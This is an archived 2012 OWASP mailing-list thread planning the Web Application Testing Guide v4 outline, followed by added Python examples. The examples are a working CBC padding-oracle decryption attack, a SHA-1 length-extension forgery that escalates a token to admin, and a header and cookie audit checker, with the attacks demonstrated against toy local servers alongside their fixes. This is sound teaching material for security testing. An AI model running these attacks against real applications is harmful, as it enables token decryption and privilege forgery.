[Owasp-testing] Testing Guide V4 - Start up

Matteo Meucci matteo.meucci at owasp.org
Wed Sep 5 10:29:36 UTC 2012


Hi,
thanks Ismael.
I'll update the ToC on the wiki (there are some items repeated twice
and some that need a closer look before deciding whether to include them).

As Kevin said mobile testing is part of another OWASP project.

Regarding the many contributors contacting me directly or asking to
contribute: first of all thanks; then please specify which
area/paragraph you would like to cover.

Paragraph template: yes, we have a template from v3; maybe we can review
that too. From the 2nd phase (writing the new guide) I'll create a new
paragraph from this template for each item to be written.

Tools: as Daniel said, yes, we have to be agnostic regarding tools.
But at the end of each paragraph, as usual, we can list the Open
Source tools that help to perform that test.

Remember that we are creating a guide for Web Application Penetration
Testing. All the tests will be called "Testing for [test]".

So cryptographic tests are good to add, but only those regarding testing
of the running application, for example Padding Oracle.
But "weak random generators" and "weak algorithms to protect data" are in
general not possible to test when performing a WebAppPentest.

WebAppSecTesting Cheat Sheet:
https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet

In the testing Guide we have already a similar paragraph (v3):
https://www.owasp.org/index.php/Testing_Checklist

I think we can use it to verify whether some items are missing; then the
cheat sheet will be updated to the new Testing Checklist paragraph (as
mentioned in the Cheat Sheet purpose).

Thanks!
Mat



On 09/05/2012 03:33 AM, Ismael Rocha wrote:
> Hello All!
> 
> I've compiled the Web App Penetration Test part from the ToC with all
> (sorry if I missed some!) suggestions presented in the list.
> 
> The results follow.
> 
> We also have to decide whether mobile will be part of the scope or not.
> 
> 
> 
> -----------------------------------------
> 
> Testing Guide V4 ToC
> 
> ...
> 
> 4 Web Application Penetration Test
> 
> 4.1 Introduction and Objectives [To review--> Mat]
> 
> 4.1.1 Testing Checklist [To review at the end of brainstorming --> Mat]
> 
> 4.2 Information Gathering [To review--> contributor here]
>    
> 
> 4.3 Configuration and Deploy Management Testing
> 
> Infrastructure Configuration management weakness
> Application Configuration management weakness
> File extensions handling
> Old, backup and unreferenced files
> Access to Admin interfaces
> Bad HTTP Methods enabled [new]
> Informative Error Messages
> Database credentials/connection strings available
> Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
> Test for policies (e.g. Flash, Silverlight, robots) [suggestion CheatSheet]
> Check for sensitive data in client-side code (e.g. API keys, credentials)
> Test for policies (e.g. Flash, Silverlight, robots)
> Test for sensitive information in logs
> 
> 
> 4.4 Authentication Testing
> 
> Credentials transport over an unencrypted channel [Robert Winkel]
> User enumeration (also Guessable user account) [Robert Winkel]
> Default passwords [Robert Winkel]
> Weak lock out mechanism [New! - Robert Winkel]
> Account lockout DoS [New! - Robert Winkel]
> Bypassing authentication schema
> Directory traversal/file include
> Vulnerable remember password [Robert Winkel]
> Browser cache weakness [New!]
> Weak password policy [New! - Robert Winkel]
> Weak username policy [New! - Robert Winkel]
> Weak security question/answer [New! - Robert Winkel]
> Failure to restrict access to authenticated resource [New!]
> Weak password change function [New! - Robert Winkel]
> Testing for CAPTCHA
> Test multi factor authentication
> Test for consistent authentication across applications with shared
> authentication schema / SSO [suggestion CheatSheet/SAML Ismael Gonçalves]
> Test for autocomplete on password forms/input
> Test for logout functionality presence
> Test for cache management on HTTP (eg Pragma, Expires, Max-age)
> Test for user-accessible authentication history
> Test for out-of channel notification of account lockouts and successful
> password changes
> 
> 4.5 Session Management Testing
> 
> Bypassing Session Management Schema
> Weak Session Token
> Cookies not set 'HttpOnly', 'Secure', and with no time validity
> Exposed sensitive session variables
> CSRF
> Session passed over http [New!]
> Session token within URL [New!]
> Session Fixation
> Session token not removed on server after logout [New!]
> Persistent session token [New!]
> Session token not restricted properly (such as domain or path not set
> properly) [New!]
> Logout function not properly implemented
> Test for consistent session management across applications with shared
> session management
> Confirm that new session tokens are issued on login, role change and logout
> 
> 4.6 Authorization Testing
> 
> Bypassing authorization schema
> Privilege Escalation
> Insecure Direct Object References
> Failure to Restrict access to authorized resource [New!]
> 
> 4.7 Business Logic Testing (OWASP-BL-001) [To review--> contributor here]
> 
> Business Logic
> 
> 4.8 Data Validation Testing
> 
> Reflected XSS
> Stored XSS
> HTTP Verb Tampering [Brad Causey]
> HTTP Parameter pollution [Brad Causey]
> Unvalidated Redirects and Forwards [Brad Causey]
> SQL Injection [Brad Causey]
> LDAP Injection
> ORM Injection
> XML Injection
> SSI Injection
> XPath Injection
> SOAP Injection
> IMAP/SMTP Injection
> Code Injection
> OS Commanding
> Buffer overflow
> Incubated vulnerability
> Test for XXE Injection
> Test for XQuery Injection
> HTTP Splitting/Smuggling
> Test for HTTP Verb Tampering
> Test for Open Redirection
> Test for Local File Inclusion
> Test for Remote File Inclusion
> Compare client-side and server-side validation rules
> Test for NoSQL injection
> Test for HTTP parameter pollution
> Test for auto-binding
> Test for HTML Injection
> Test for File upload
> Expression Language Injection
> 
> 4.9 Testing for Data Encryption (New!)
> 
> Application did not use encryption
> Weak SSL/TLS Ciphers
> Insufficient Transport Layer Protection
> Cacheable HTTPS Response
> Cache directives insecure
> Insecure Cryptographic Storage [mainly CR Guide]
> Sensitive information sent via unencrypted channels
> 
> 
> 4.10 XML Interpreter? (New!)
> 
> Weak XML Structure
> XML content-level
> WS HTTP GET parameters/REST
> WS Naughty SOAP attachments
> WS Replay Testing
> 
> 4.11 Client Side Testing (New!)
> 
> DOM XSS
> Cross Site Flashing
> Clickjacking
> JSON
> HTML 5
> 
> 4.12 Denial of Service
> 
> Test for account lockout
> Test for HTTP protocol DoS
> 
> 4.13 Evasive Techniques in General
> 
> ...
> 
> Regards.
> 
> Ismael Gonçalves
> 
> On Tue, Sep 4, 2012 at 6:39 PM, Ismael Rocha
> <ismaelrocha.projetos at gmail.com>
> wrote:
> 
>     Hello.
> 
>     I think maybe we should make a cross-reference between the ToC and
>     the Testing Cheat Sheet. It would help us to identify which aspects
>     are covered and which aren't covered in the ToC.
>     For example: SSO is covered in the cheatsheet and not covered in the
>     ToC. Also HTTP DoS.
>     It also can give us some ideas about the names of the sections. If
>     anybody did it already I can do it.
> 
>     Ismael Gonçalves
> 
>     https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
> 
>     https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
> 
> 
>     On Tue, Sep 4, 2012 at 6:16 PM, Simone Onofri
>     <simone.onofri at gmail.com> wrote:
> 
>         On Tue, Sep 4, 2012 at 11:13 PM, Ismael Rocha
>         <ismaelrocha.projetos at gmail.com> wrote:
>         > Hello.
> 
>         hi ismael,
> 
>         > As I mentioned some days ago, I suggested improving the SSL Test,
>         > maybe based on Qualys SSL Labs issues and others.
>         >
>         > "SSL Test
>         >  -> Enhance (maybe based on Qualys SSL Labs tests?)"
> 
> 
>         +1, i also use it!
> 
>         > Still talking about "cryptography not used when necessary", I
>         > would say that it is important to cover aspects of technologies
>         > which use the ViewState concept (e.g. JSF, .NET).
> 
>         of course!
> 
> 
>         > Ismael Gonçalves
>         >
>         >
>         > On Tue, Sep 4, 2012 at 5:42 PM, Simone Onofri
>         > <simone.onofri at gmail.com> wrote:
>         >>
>         >> hi all,
>         >>
>         >> I see the question is that "data encryption" covers both
>         >> transmission and storage.
>         >>
>         >> Historically the two issues are divided. To brainstorm some
>         >> stuff, also using the web application security testing
>         >> checklist [1]:
>         >>
>         >>  - not used when necessary (e.g. for credential
>         >>    transportation or storage)
>         >>  - algorithms
>         >>    - weak/homebrew (e.g. on SSL or when developers use weak
>         >>      algorithms to protect data)
>         >>    - wrong context (e.g. symmetric encryption for password
>         >>      storage)
>         >>    - improper usage (e.g. hashing without salting, KDF with too
>         >>      few iterations)
>         >>  - keys and secrets
>         >>    - weak/short/guessable (e.g. also on SSL)
>         >>  - entropy issues
>         >>    - weak random generators
>         >>    - ...
>         >>
>         >> ideas?
>         >>
>         >> s.
>         >>
>         >>
>         >> [1]
>         >> https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
>         >> On Tue, Sep 4, 2012 at 9:56 PM, Juan Galiana Lara
>         >> <jgaliana at owasp.org> wrote:
>         >> > +1!
>         >> >
>         >> > I think this is really important to cover.
>         >> >
>         >> > I've seen a new "Testing for Data Encryption (New!)" under the
>         >> > data validation section, but I would rather consider having a
>         >> > main section for "Cryptography" at the same level as
>         >> > authentication, authorization, data validation and so on.
>         >> >
>         >> > Cryptography is one of the most important topics in security,
>         >> > and there have been quite significant crypto vulnerabilities
>         >> > applied to webapps, like the padding oracle attack technique
>         >> > that was applied to decrypt HTTP cookies in several frameworks
>         >> > like ASP.NET, ROR and JSF two years back. Or the one Eduardo
>         >> > mentioned, extension attacks due to improper use or lack of use
>         >> > of HMAC algorithms, which is quite common.
>         >> >
>         >> > Actually, there are already a few sections under DV in the new
>         >> > table of contents that would fit in that section:
>         >> >
>         >> > Testing for Data Encryption (New!)
>         >> >
>         >> > Application did not use encryption
>         >> > Weak SSL/TLS Ciphers
>         >> >
>         >> > Insufficient Transport Layer Protection
>         >> >
>         >> > Insecure Cryptographic Storage [mainly CR Guide]
>         >> >
>         >> >
>         >> > Thoughts?
>         >> >
>         >> >
>         >> > --
>         >> > Juan Galiana
>         >> >
>         >> >
>         >> > On Tue, Sep 4, 2012 at 3:58 AM, Eduardo Castellanos
>         >> > <guayin at gmail.com> wrote:
>         >> >>
>         >> >> Hello,
>         >> >>
>         >> >> What about a section for cryptographic attacks? Bad use of
>         >> >> crypto functions in general (Hash Length Extension, etc.), or
>         >> >> would that be outside the scope of the guide?
>         >> >>
>         >> >> Related links:
>         >> >>
>         >> >> https://blog.whitehatsec.com/hash-length-extension-attacks/
>         >> >> https://www.owasp.org/index.php/Category:Cryptographic_Vulnerability
>         >> >> http://blogs.msdn.com/b/ace_team/archive/2008/11/13/vulnerabilities-due-to-improper-use-of-crypto-part-1.aspx
>         >> >>
>         >> >>
>         >> >> Eduardo Castellanos N.
>         >> >>
>         >> >>
>         >> >>
>         >> >> On Mon, Sep 3, 2012 at 8:01 PM, Robert Winkel
>         >> >> <robert.winkel at saltbushgroup.com> wrote:
>         >> >>>
>         >> >>> I have taken the liberty of assigning myself against several
>         >> >>> of the Authentication Testing test cases.  I am happy to hand
>         >> >>> those over if someone is interested in being assigned to those
>         >> >>> instead.
>         >> >>>
>         >> >>> What happened to the Denial of Service test cases?
>         >> >>>
>         >> >>> Is there a template to adhere to when the writing stage
>         >> >>> begins?
>         >> >>>
>         >> >>> _______________________________________
>         >> >>> Robert “Bull” Winkel
>         >> >>> Director Saltbush Assurance
>         >> >>> email: robert.winkel at saltbushgroup.com
>         >> >>> http://www.linkedin.com/in/robertwinkel
>         >> >>>
>         >> >>>
>         >> >>> -----Original Message-----
>         >> >>> From: owasp-testing-bounces at lists.owasp.org
>         >> >>> [mailto:owasp-testing-bounces at lists.owasp.org] On Behalf Of
>         >> >>> Matteo Meucci
>         >> >>> Sent: Friday, 31 August 2012 1:40 AM
>         >> >>> To: owasp-testing at lists.owasp.org
>         >> >>> Subject: [Owasp-testing] Testing Guide V4 - Start up
>         >> >>>
>         >> >>> Hi all Testing Guide contributors.
>         >> >>>
>         >> >>> Testing Guide v4 has been approved as Projects Reboot 2012!
>         >> >>> https://www.owasp.org/index.php/Projects_Reboot_2012
>         >> >>>
>         >> >>> Here is the list of contributors I've collected:
>         >> >>>
>         >> >>> Pavol Luptak
>         >> >>> Marco Morana
>         >> >>> Giorgio Fedon
>         >> >>> Stefano Di Paola
>         >> >>> Gianrico Ingrosso
>         >> >>> Giuseppe Bonfà
>         >> >>> Roberto Suggi Liverani
>         >> >>> Robert Smith
>         >> >>> Andrew Muller
>         >> >>> Robert Winkel
>         >> >>> tripurari rai
>         >> >>> Thomas Ryan
>         >> >>> tim bertels
>         >> >>> Cecil Su
>         >> >>> Aung KhAnt
>         >> >>> Norbert Szetei
>         >> >>> michael.boman
>         >> >>> Wagner Elias
>         >> >>> Kevin Horvat
>         >> >>> Juan Galiana Lara
>         >> >>> Kenan Gursoy
>         >> >>> Jason Flood
>         >> >>> Javier Marcos de Prado
>         >> >>> Sumit Siddharth
>         >> >>> Mike Hryekewicz
>         >> >>> psiinon
>         >> >>> Ray Schippers
>         >> >>> Raul Siles
>         >> >>> Jayanta Karmakar
>         >> >>> Brad Causey
>         >> >>> Vicente Aguilera
>         >> >>> Ismael Gonçalves
>         >> >>>
>         >> >>> Reviewers team:
>         >> >>>
>         >> >>> Paolo Perego
>         >> >>> Daniel Cuthbert
>         >> >>> Matthew Churcher
>         >> >>> Lode Vanstechelman
>         >> >>> Sebastien Gioria
>         >> >>>
>         >> >>>
>         >> >>> Introduction and Project purpose for v4:
>         >> >>> =======================================
>         >> >>> The OWASP Testing Guide v3 includes a "best practice"
>         >> >>> penetration testing framework which users can implement in
>         >> >>> their own organizations and a "low level" penetration testing
>         >> >>> guide that describes techniques for testing the most common
>         >> >>> web application and web service security issues. Nowadays the
>         >> >>> Testing Guide has become the standard for performing Web
>         >> >>> Application Penetration Testing, and many companies all
>         >> >>> around the world have adopted it.
>         >> >>> It is vital for the project to maintain an updated guide that
>         >> >>> represents the state of the art for WebAppSec.
>         >> >>>
>         >> >>> Project Roadmap
>         >> >>> ===============
>         >> >>>
>         >> >>> - (1) 1st phase: Brainstorming and create a new table of
>         >> >>>   contents
>         >> >>>
>         >> >>> Objective: creating a new table of contents of the OTGv4,
>         >> >>> assigning a task for each contributor.
>         >> >>> I created a new OWASP Testing Guide v4 table of Contents
>         >> >>> here:
>         >> >>>
>         >> >>> https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
>         >> >>>
>         >> >>> - (2) 2nd phase: Writing
>         >> >>>
>         >> >>> - 20th September 2012: Start writing the articles
>         >> >>> - 1st November 2012: 1st Draft
>         >> >>> - 30th November: end of writing phase
>         >> >>>
>         >> >>> - (3) 3rd phase: Reviewing
>         >> >>>
>         >> >>> - 1st December 2012: Starting the review phase,
>         >> >>> - 15th December 2012: Create the RC1,
>         >> >>> - 31st January 2013: Release the version 4.
>         >> >>>
>         >> >>> Timeline: November 2012 1st Draft, January 2013 Final Release
>         >> >>>
>         >> >>> So, let's start discussion about phase (1)!
>         >> >>>
>         >> >>> Thanks!
>         >> >>> Mat
>         >> >>>
>         >> >>> --
>         >> >>> Matteo Meucci
>         >> >>> OWASP Testing Guide Lead
>         >> >>> OWASP-Italy President
>         >> >>>
>         >> >>>
>         >> >>> _______________________________________________
>         >> >>> Owasp-testing mailing list
>         >> >>> Owasp-testing at lists.owasp.org
>         >> >>> https://lists.owasp.org/mailman/listinfo/owasp-testing
>         >> >>
>         >> >>
>         >> >>
>         >> >>
>         >> >
>         >> >
>         >> >
>         >
>         >
>         >
>         >
>         > --
>         > Ismael Gonçalves
> 
> 
> 
> 
>     -- 
>     Ismael Gonçalves
> 
> 
> 
> 
> -- 
> Ismael Gonçalves
> 
> 
> 

--
Matteo Meucci
OWASP Testing Guide Lead
OWASP Italy President
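Matteo's point above, that a Padding Oracle is one of the few cryptographic weaknesses a black-box WebAppPentest can actually exercise against the running application, is worth seeing end to end: the tester needs nothing but a CBC-encrypted token (a cookie or a ViewState blob) and a server whose "bad padding" response is distinguishable from its other errors. The script below is an added example written for this page; it is not code from this thread or from the OWASP Testing Guide. Its block cipher is an assumption made so it runs on the Python standard library alone (a 4-round Feistel network with an HMAC-SHA256 round function standing in for AES); the attack itself never looks inside the cipher, and the token, key and plaintext are constructed sample data. It also shows the fix the tester should recommend, encrypt-then-MAC, and that the same attack code gets no answer from it.

```python
# CBC padding-oracle attack driven only by the server's accept/reject answer.
# Added example, not code from this thread or from the OWASP Testing Guide.
# Assumption: the 128-bit block cipher is a Feistel/HMAC stand-in for AES.
import hashlib
import hmac
import os
BLOCK = 16

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, plaintext: bytes) -> bytes:
    # returns IV || C1 || ... || Cn with PKCS#7 padding
    n = BLOCK - len(plaintext) % BLOCK
    data = plaintext + bytes([n]) * n
    prev = os.urandom(BLOCK)
    out = [prev]
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, ct: bytes) -> bytes:
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def make_padding_oracle(key: bytes):
    """Vulnerable server: a tampered token yields a distinguishable padding error."""
    def oracle(ct: bytes) -> bool:
        try:
            pkcs7_unpad(cbc_decrypt(key, ct))
            return True
        except ValueError:
            return False
    return oracle

def seal(key: bytes, mac_key: bytes, plaintext: bytes) -> bytes:
    ct = cbc_encrypt(key, plaintext)  # hardened form: token = ct || HMAC-SHA256(ct)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def make_mac_oracle(key: bytes, mac_key: bytes):
    def oracle(token: bytes) -> bool:
        ct, tag = token[:-32], token[-32:]
        if not hmac.compare_digest(hmac.new(mac_key, ct, hashlib.sha256).digest(), tag):
            return False  # tampered ciphertext never reaches unpad, so there is no oracle
        return make_padding_oracle(key)(ct)
    return oracle

def padding_oracle_attack(oracle, ct: bytes) -> bytes:
    """Recover the plaintext of IV||C1..Cn from the oracle's yes/no answers only."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    plain = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # block_decrypt(key, cur), learned one byte at a time
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            crafted = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                crafted[j] = inter[j] ^ pad  # known bytes forced to the wanted pad value
            for guess in range(256):
                crafted[pos] = guess
                if not oracle(bytes(crafted) + cur):
                    continue
                if pos == BLOCK - 1:
                    # rule out a false positive such as ..\x02\x02: real \x01 padding
                    # must still be accepted after the byte before it is changed
                    probe = bytearray(crafted)
                    probe[pos - 1] ^= 0x01
                    if not oracle(bytes(probe) + cur):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                raise ValueError("oracle accepted nothing: not exploitable this way")
        plain += _xor(bytes(inter), prev)
    return pkcs7_unpad(plain)

def demo(plaintext: bytes = b"user=alice;role=user"):
    """Run the attack against both servers; returns (recovered, hardened_resists)."""
    key, mac_key = os.urandom(16), os.urandom(16)
    recovered = padding_oracle_attack(make_padding_oracle(key), cbc_encrypt(key, plaintext))
    try:
        padding_oracle_attack(make_mac_oracle(key, mac_key), seal(key, mac_key, plaintext))
        return recovered, False
    except ValueError:
        return recovered, True
```

`demo()` recovers the constructed plaintext with at most 256 requests per byte (about 4,000 for a two-block token) and, against the encrypt-then-MAC server, gets no usable answer at all. In a real engagement the oracle is whatever differs between "bad padding" and "good padding but garbage": an exception page, a status code, or just response time, which is why the test belongs in the guide even though the tester never sees the key.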

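The hash length extension attack that Eduardo and Juan raise is the other crypto issue a tester can demonstrate black-box: when a token's "signature" is SHA1(secret || message), anyone who sees the tag can append data and compute a valid tag for the extended message without the secret, because the digest is the hash's full internal state. The following is an added example written for this page, not code from this thread or from the OWASP Testing Guide; the secret, message and extension are constructed sample data, and the only assumption the attacker makes in practice is the secret's length (which can simply be brute-forced over a small range). A standalone SHA-1 is included because hashlib cannot be resumed from a chosen state.

```python
# SHA-1 length-extension forgery against MAC = SHA1(secret || message).
# Added example, not from this thread or the OWASP Testing Guide.
# Sample secret/message/extension below are constructed data.
import hashlib
import hmac
import struct

_H0 = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)

def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def _compress(h, chunk: bytes):
    """One SHA-1 block: 80 rounds over a 64-byte chunk, starting from state h."""
    w = list(struct.unpack(">16I", chunk))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = h
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        temp = (_rotl(a, 5) + (f & 0xFFFFFFFF) + e + k + w[i]) & 0xFFFFFFFF
        a, b, c, d, e = temp, a, _rotl(b, 30), c, d
    return tuple((x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d, e)))

def md_padding(message_len: int) -> bytes:
    """Bytes SHA-1 appends to a message of message_len bytes (0x80, zeros, bit length)."""
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)

def sha1(data: bytes, state=_H0, prior_len: int = 0) -> bytes:
    """SHA-1 of data; optionally resume from a known state after prior_len bytes
    (prior_len must be block-aligned, i.e. a multiple of 64)."""
    h = state
    padded = data + md_padding(prior_len + len(data))
    for i in range(0, len(padded), 64):
        h = _compress(h, padded[i:i + 64])
    return struct.pack(">5I", *h)

def naive_mac(secret: bytes, message: bytes) -> bytes:
    """The vulnerable construction the server uses."""
    return hashlib.sha1(secret + message).digest()

def length_extend(message: bytes, tag: bytes, secret_len: int, extension: bytes):
    """Forge (message || glue || extension) and its valid tag without the secret."""
    glue = md_padding(secret_len + len(message))      # padding the server hashed over
    consumed = secret_len + len(message) + len(glue)   # block-aligned prefix already absorbed
    forged_tag = sha1(extension, state=struct.unpack(">5I", tag), prior_len=consumed)
    return message + glue + extension, forged_tag

def demo(secret=b"s3cr3t-server-key", message=b"user=alice&role=user", extension=b"&role=admin"):
    """Returns (server_accepts_forgery, forged_message, forged_tag)."""
    tag = naive_mac(secret, message)                    # all the attacker observes
    forged_msg, forged_tag = length_extend(message, tag, len(secret), extension)
    return naive_mac(secret, forged_msg) == forged_tag, forged_msg, forged_tag

def hmac_resists(secret=b"s3cr3t-server-key", message=b"user=alice&role=user", extension=b"&role=admin") -> bool:
    """Same forgery attempted against HMAC-SHA1: the extended tag does not verify."""
    tag = hmac.new(secret, message, hashlib.sha1).digest()
    forged_msg, forged_tag = length_extend(message, tag, len(secret), extension)
    return hmac.new(secret, forged_msg, hashlib.sha1).digest() != forged_tag
```

The forged message carries the glue padding bytes in the middle, which is why the attack works so well against "last key wins" parsers such as query strings and cookie maps: `role=user` is still present, but `&role=admin` comes later. `hmac_resists()` shows the recommended fix; HMAC's outer hash means the tag is not the internal state of a hash over the attacker-visible data.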

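Several ToC items above are pure response inspection and are easy to make repeatable: "Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)", "Cookies not set 'HttpOnly', 'Secure'", "Persistent session token", "Cache directives insecure" and "Test for cache management on HTTP". The checker below is an added example written for this page, not OWASP Testing Guide code. The HTTP response it audits is constructed sample data, not a capture from any site; the `over_tls` flag is an assumption the tester supplies, since HSTS and the Secure flag are only meaningful findings for a site served over HTTPS.

```python
# Response-header / cookie-attribute checks for the Configuration and Session
# Management items in the ToC. Added example, not OWASP Testing Guide code.
# SAMPLE_RESPONSE is constructed sample data.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: JSESSIONID=2E3A9C7F1B; Path=/\r\n"
    "Set-Cookie: csrf=4f9d1c; Path=/; Secure; HttpOnly; SameSite=Strict\r\n"
    "Set-Cookie: remember=alice; Path=/; Max-Age=2592000; Secure\r\n"
    "Cache-Control: private, max-age=600\r\n"
    "X-Frame-Options: DENY\r\n"
    "\r\n"
    "<html><body>account page</body></html>"
)

def parse_headers(raw: str):
    """Split a raw HTTP response into (status line, [(name_lower, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers

def parse_cookie(set_cookie: str):
    """Return (cookie name, {attribute_lower: value or True}) for one Set-Cookie value."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip() or True
    return name, attrs

def audit_response(raw: str, over_tls: bool = True):
    """Return a list of (check_id, detail) findings for the response."""
    _, headers = parse_headers(raw)
    values = lambda n: [v for k, v in headers if k == n]
    findings = []
    csp = " ".join(values("content-security-policy")).lower()
    if not csp:
        findings.append(("CSP", "Content-Security-Policy header missing"))
    if not values("x-frame-options") and "frame-ancestors" not in csp:
        findings.append(("XFO", "no X-Frame-Options and no CSP frame-ancestors: clickjacking not mitigated"))
    if over_tls and not values("strict-transport-security"):
        findings.append(("HSTS", "Strict-Transport-Security header missing"))
    cc = " ".join(values("cache-control")).lower()
    if "no-store" not in cc:
        findings.append(("CACHE", f"Cache-Control {cc!r} lacks no-store: authenticated response may be cached"))
    for sc in values("set-cookie"):
        name, attrs = parse_cookie(sc)
        if over_tls and "secure" not in attrs:
            findings.append(("COOKIE", f"{name}: Secure flag missing, cookie can be sent over plain http"))
        if "httponly" not in attrs:
            findings.append(("COOKIE", f"{name}: HttpOnly flag missing, readable from script after XSS"))
        if "samesite" not in attrs:
            findings.append(("COOKIE", f"{name}: SameSite not set"))
        if "expires" in attrs or "max-age" in attrs:
            findings.append(("COOKIE", f"{name}: persistent (Expires/Max-Age set); confirm it is not a session token"))
    return findings
```

On the sample response the checker reports the missing CSP and HSTS headers, the cacheable authenticated page, and that `JSESSIONID` has neither Secure nor HttpOnly, while the `csrf` cookie passes every check. It deliberately does not report X-Frame-Options because `DENY` is present; a CSP `frame-ancestors` directive would satisfy the same check.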